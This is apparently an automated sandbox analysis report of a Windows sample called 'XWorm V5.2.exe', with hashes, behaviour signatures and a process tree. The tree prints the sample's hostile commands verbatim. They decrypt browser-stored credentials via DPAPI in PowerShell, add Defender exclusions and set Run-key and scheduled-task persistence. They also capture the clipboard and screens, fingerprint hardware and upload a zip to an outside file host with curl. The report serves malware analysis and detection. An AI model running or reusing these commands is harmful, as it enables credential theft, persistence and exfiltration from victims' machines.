Analysis
-
max time kernel
34s -
max time network
46s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09/09/2024, 15:51
Static task
static1
Behavioral task
behavioral1
Sample
XWorm V5.2.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
XWorm V5.2.exe
Resource
win10v2004-20240802-en
General
-
Target
XWorm V5.2.exe
-
Size
37.7MB
-
MD5
4d2fe88411ca382a705f7de70505f8ee
-
SHA1
992be069e1123ea68a414ce462f2b7a0e5c39563
-
SHA256
1180b5ce40dfeadc5843448e0f163408aa33f23abe39030d5eecaf37fc17d551
-
SHA512
8df4399dc43b854fd72764b426146044799aaea80a07dbecf4d28941b957af1b480ade452fd020912c37b54280a057f02be19c10812f59ab3b8f2d45c0a82b43
-
SSDEEP
786432:V3on1HvSzxAMNwFZArYsHPv697OZYV797:VYn1HvSpNwXmvYJX
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 2816 powershell.exe 1300 powershell.exe 4020 powershell.exe 944 powershell.exe 3540 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation XWorm V5.2.exe Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation cscript.exe -
Clipboard Data 1 TTPs 1 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 1840 cmd.exe -
Loads dropped DLL 1 IoCs
pid Process 4976 XWorm V5.2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\fLViPrCntulUySs.ps1\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWorm V5.2.exe" reg.exe -
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 1840 cmd.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 4012 cmd.exe 3576 cmd.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 400 tasklist.exe 4328 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1792 WMIC.exe 2700 WMIC.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 4428 reg.exe 1164 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4388 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 944 powershell.exe 944 powershell.exe 4952 powershell.exe 4952 powershell.exe 1932 powershell.exe 1932 powershell.exe 2816 powershell.exe 2816 powershell.exe 2816 powershell.exe 1300 powershell.exe 1300 powershell.exe 1300 powershell.exe 4020 powershell.exe 4020 powershell.exe 4020 powershell.exe 4328 powershell.exe 4328 powershell.exe 4328 powershell.exe 3608 powershell.exe 3608 powershell.exe 3540 powershell.exe 3540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 944 powershell.exe Token: SeDebugPrivilege 400 tasklist.exe Token: SeDebugPrivilege 4328 tasklist.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeDebugPrivilege 1932 powershell.exe Token: SeIncreaseQuotaPrivilege 4372 WMIC.exe Token: SeSecurityPrivilege 4372 WMIC.exe Token: SeTakeOwnershipPrivilege 4372 WMIC.exe Token: SeLoadDriverPrivilege 4372 WMIC.exe Token: SeSystemProfilePrivilege 4372 WMIC.exe Token: SeSystemtimePrivilege 4372 WMIC.exe Token: SeProfSingleProcessPrivilege 4372 WMIC.exe Token: SeIncBasePriorityPrivilege 4372 WMIC.exe Token: SeCreatePagefilePrivilege 4372 WMIC.exe Token: SeBackupPrivilege 4372 WMIC.exe Token: SeRestorePrivilege 4372 WMIC.exe Token: SeShutdownPrivilege 4372 WMIC.exe Token: SeDebugPrivilege 4372 WMIC.exe Token: SeSystemEnvironmentPrivilege 4372 WMIC.exe Token: SeRemoteShutdownPrivilege 4372 WMIC.exe Token: SeUndockPrivilege 4372 WMIC.exe Token: SeManageVolumePrivilege 4372 WMIC.exe Token: 33 4372 WMIC.exe Token: 34 4372 WMIC.exe Token: 35 4372 WMIC.exe Token: 36 4372 WMIC.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeIncreaseQuotaPrivilege 4372 WMIC.exe Token: SeSecurityPrivilege 4372 WMIC.exe Token: SeTakeOwnershipPrivilege 4372 WMIC.exe Token: SeLoadDriverPrivilege 4372 WMIC.exe Token: SeSystemProfilePrivilege 4372 WMIC.exe Token: SeSystemtimePrivilege 4372 WMIC.exe Token: SeProfSingleProcessPrivilege 4372 WMIC.exe Token: SeIncBasePriorityPrivilege 4372 WMIC.exe Token: SeCreatePagefilePrivilege 4372 WMIC.exe Token: SeBackupPrivilege 4372 WMIC.exe Token: SeRestorePrivilege 4372 WMIC.exe Token: SeShutdownPrivilege 4372 WMIC.exe Token: SeDebugPrivilege 4372 WMIC.exe Token: SeSystemEnvironmentPrivilege 4372 WMIC.exe Token: SeRemoteShutdownPrivilege 4372 WMIC.exe Token: SeUndockPrivilege 4372 WMIC.exe Token: SeManageVolumePrivilege 4372 WMIC.exe Token: 33 4372 WMIC.exe Token: 34 4372 WMIC.exe Token: 35 4372 WMIC.exe Token: 36 4372 WMIC.exe Token: SeIncreaseQuotaPrivilege 1904 WMIC.exe Token: SeSecurityPrivilege 1904 WMIC.exe Token: SeTakeOwnershipPrivilege 1904 WMIC.exe Token: SeLoadDriverPrivilege 1904 WMIC.exe Token: SeSystemProfilePrivilege 1904 WMIC.exe Token: SeSystemtimePrivilege 1904 WMIC.exe Token: SeProfSingleProcessPrivilege 1904 WMIC.exe Token: SeIncBasePriorityPrivilege 1904 WMIC.exe Token: SeCreatePagefilePrivilege 1904 WMIC.exe Token: SeBackupPrivilege 1904 WMIC.exe Token: SeRestorePrivilege 1904 WMIC.exe Token: SeShutdownPrivilege 1904 WMIC.exe Token: SeDebugPrivilege 1904 WMIC.exe Token: SeSystemEnvironmentPrivilege 1904 WMIC.exe Token: SeRemoteShutdownPrivilege 1904 WMIC.exe Token: SeUndockPrivilege 1904 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4976 wrote to memory of 428 4976 XWorm V5.2.exe 87 PID 4976 wrote to memory of 428 4976 XWorm V5.2.exe 87 PID 428 wrote to memory of 5068 428 cmd.exe 88 PID 428 wrote to memory of 5068 428 cmd.exe 88 PID 428 wrote to memory of 944 428 cmd.exe 89 PID 428 wrote to memory of 944 428 cmd.exe 89 PID 944 wrote to memory of 4876 944 powershell.exe 91 PID 944 wrote to memory of 4876 944 powershell.exe 91 PID 4876 wrote to memory of 4476 4876 csc.exe 92 PID 4876 wrote to memory of 4476 4876 csc.exe 92 PID 4976 wrote to memory of 3476 4976 XWorm V5.2.exe 93 PID 4976 wrote to memory of 3476 4976 XWorm V5.2.exe 93 PID 4976 wrote to memory of 5084 4976 XWorm V5.2.exe 94 PID 4976 wrote to memory of 5084 4976 XWorm V5.2.exe 94 PID 5084 wrote to memory of 400 5084 cmd.exe 95 PID 5084 wrote to memory of 400 5084 cmd.exe 95 PID 3476 wrote to memory of 952 3476 cmd.exe 96 PID 3476 wrote to memory of 952 3476 cmd.exe 96 PID 4976 wrote to memory of 3600 4976 XWorm V5.2.exe 98 PID 4976 wrote to memory of 3600 4976 XWorm V5.2.exe 98 PID 4976 wrote to memory of 4012 4976 XWorm V5.2.exe 99 PID 4976 wrote to memory of 4012 4976 XWorm V5.2.exe 99 PID 4012 wrote to memory of 4952 4012 cmd.exe 100 PID 4012 wrote to memory of 4952 4012 cmd.exe 100 PID 3600 wrote to memory of 4328 3600 cmd.exe 101 PID 3600 wrote to memory of 4328 3600 cmd.exe 101 PID 4976 wrote to memory of 3576 4976 XWorm V5.2.exe 102 PID 4976 wrote to memory of 3576 4976 XWorm V5.2.exe 102 PID 3576 wrote to memory of 1932 3576 cmd.exe 103 PID 3576 wrote to memory of 1932 3576 cmd.exe 103 PID 4976 wrote to memory of 3996 4976 XWorm V5.2.exe 104 PID 4976 wrote to memory of 3996 4976 XWorm V5.2.exe 104 PID 4976 wrote to memory of 3792 4976 XWorm V5.2.exe 105 PID 4976 wrote to memory of 3792 4976 XWorm V5.2.exe 105 PID 4976 wrote to memory of 4380 4976 XWorm V5.2.exe 106 PID 4976 wrote to memory of 4380 4976 XWorm V5.2.exe 106 PID 4976 wrote to memory of 1840 4976 XWorm V5.2.exe 108 PID 4976 wrote to memory of 1840 4976 XWorm V5.2.exe 108 PID 3996 wrote to memory of 4372 3996 cmd.exe 107 PID 3996 wrote to memory of 4372 3996 cmd.exe 107 PID 1840 wrote to memory of 2816 1840 cmd.exe 109 PID 1840 wrote to memory of 2816 1840 cmd.exe 109 PID 4380 wrote to memory of 4388 4380 cmd.exe 110 PID 4380 wrote to memory of 4388 4380 cmd.exe 110 PID 4976 wrote to memory of 4524 4976 XWorm V5.2.exe 112 PID 4976 wrote to memory of 4524 4976 XWorm V5.2.exe 112 PID 4524 wrote to memory of 3112 4524 cmd.exe 113 PID 4524 wrote to memory of 3112 4524 cmd.exe 113 PID 4976 wrote to memory of 412 4976 XWorm V5.2.exe 114 PID 4976 wrote to memory of 412 4976 XWorm V5.2.exe 114 PID 412 wrote to memory of 1904 412 cmd.exe 115 PID 412 wrote to memory of 1904 412 cmd.exe 115 PID 3112 wrote to memory of 1944 3112 cscript.exe 116 PID 3112 wrote to memory of 1944 3112 cscript.exe 116 PID 2816 wrote to memory of 3912 2816 powershell.exe 118 PID 2816 wrote to memory of 3912 2816 powershell.exe 118 PID 3912 wrote to memory of 4536 3912 csc.exe 119 PID 3912 wrote to memory of 4536 3912 csc.exe 119 PID 1944 wrote to memory of 1300 1944 cmd.exe 120 PID 1944 wrote to memory of 1300 1944 cmd.exe 120 PID 4976 wrote to memory of 1920 4976 XWorm V5.2.exe 121 PID 4976 wrote to memory of 1920 4976 XWorm V5.2.exe 121 PID 1920 wrote to memory of 524 1920 cmd.exe 153 PID 1920 wrote to memory of 524 1920 cmd.exe 153 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"2⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "3⤵PID:5068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nh1y3ziu\nh1y3ziu.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FBF.tmp" "c:\Users\Admin\AppData\Local\Temp\nh1y3ziu\CSC74DE58826678436387CF4891271BA99.TMP"5⤵PID:4476
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,254,33,137,177,235,50,182,20,81,71,143,26,227,205,89,196,240,80,196,222,21,156,80,97,105,113,161,9,98,115,51,158,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,8,25,245,219,66,165,39,134,60,176,136,236,243,209,73,137,143,250,180,241,246,190,236,128,2,126,40,240,229,10,145,48,0,0,0,156,243,29,117,250,184,13,93,102,181,9,212,190,202,73,37,247,246,190,19,121,110,7,4,155,70,87,154,232,235,107,223,181,174,244,140,209,239,140,6,5,187,215,220,105,18,21,103,64,0,0,0,4,74,51,195,112,34,198,233,219,135,56,111,144,11,66,229,181,196,164,135,1,247,222,63,169,213,206,118,61,188,8,69,213,132,2,178,108,186,120,244,105,96,50,170,73,23,190,214,136,13,64,247,198,47,14,253,143,253,117,42,80,1,6,248), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,254,33,137,177,235,50,182,20,81,71,143,26,227,205,89,196,240,80,196,222,21,156,80,97,105,113,161,9,98,115,51,158,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,8,25,245,219,66,165,39,134,60,176,136,236,243,209,73,137,143,250,180,241,246,190,236,128,2,126,40,240,229,10,145,48,0,0,0,156,243,29,117,250,184,13,93,102,181,9,212,190,202,73,37,247,246,190,19,121,110,7,4,155,70,87,154,232,235,107,223,181,174,244,140,209,239,140,6,5,187,215,220,105,18,21,103,64,0,0,0,4,74,51,195,112,34,198,233,219,135,56,111,144,11,66,229,181,196,164,135,1,247,222,63,169,213,206,118,61,188,8,69,213,132,2,178,108,186,120,244,105,96,50,170,73,23,190,214,136,13,64,247,198,47,14,253,143,253,117,42,80,1,6,248), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,189,235,105,13,230,226,179,234,164,7,77,240,115,231,147,216,38,56,133,37,36,206,37,38,201,19,140,48,232,238,106,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,118,170,236,162,75,92,79,39,145,94,82,140,167,251,65,199,8,143,133,113,29,80,221,31,248,166,34,62,97,129,50,100,48,0,0,0,46,137,80,237,156,67,148,47,73,90,97,33,70,249,185,197,89,27,227,86,185,150,42,24,240,243,166,244,41,217,138,208,204,27,38,38,110,64,50,108,188,191,119,211,255,232,40,188,64,0,0,0,41,143,84,6,127,25,219,124,207,140,89,129,98,187,233,102,232,113,181,71,95,6,121,220,0,124,241,59,121,6,17,73,184,105,105,153,107,23,51,31,29,92,33,56,43,160,205,172,173,161,221,201,12,38,71,198,248,147,146,131,103,213,208,194), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,189,235,105,13,230,226,179,234,164,7,77,240,115,231,147,216,38,56,133,37,36,206,37,38,201,19,140,48,232,238,106,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,118,170,236,162,75,92,79,39,145,94,82,140,167,251,65,199,8,143,133,113,29,80,221,31,248,166,34,62,97,129,50,100,48,0,0,0,46,137,80,237,156,67,148,47,73,90,97,33,70,249,185,197,89,27,227,86,185,150,42,24,240,243,166,244,41,217,138,208,204,27,38,38,110,64,50,108,188,191,119,211,255,232,40,188,64,0,0,0,41,143,84,6,127,25,219,124,207,140,89,129,98,187,233,102,232,113,181,71,95,6,121,220,0,124,241,59,121,6,17,73,184,105,105,153,107,23,51,31,29,92,33,56,43,160,205,172,173,161,221,201,12,38,71,198,248,147,146,131,103,213,208,194), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"2⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"2⤵PID:3792
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f3⤵PID:1412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"2⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM3⤵
- Scheduled Task/Job: Scheduled Task
PID:4388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""2⤵
- Clipboard Data
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avrlft3j\avrlft3j.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES881C.tmp" "c:\Users\Admin\AppData\Local\Temp\avrlft3j\CSC87C3F6CE2B134931B8302F8ACD14F9C4.TMP"5⤵PID:4536
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""2⤵
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\system32\cscript.execscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4020
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe" /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:4428
-
-
C:\Windows\system32\reg.exereg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"5⤵
- Modifies registry key
PID:1164
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE5⤵PID:2024
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"2⤵
- Suspicious use of WriteProcessMemory
PID:412 -
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"2⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid3⤵PID:524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"2⤵PID:4324
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID3⤵PID:2996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"2⤵PID:2264
-
C:\Windows\System32\Wbem\WMIC.exewmic memorychip get serialnumber3⤵PID:2400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵PID:1924
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:2480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"2⤵PID:1232
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get processorid3⤵PID:1424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "getmac /NH"2⤵PID:1764
-
C:\Windows\system32\getmac.exegetmac /NH3⤵PID:220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3396
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:4404
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5044
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2156
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5092
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:3628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2084
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:1904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2364
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:4892
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3196
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:2700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:1332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4100
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:3088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""2⤵PID:1476
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Erhqjvyq.zip";"2⤵PID:2416
-
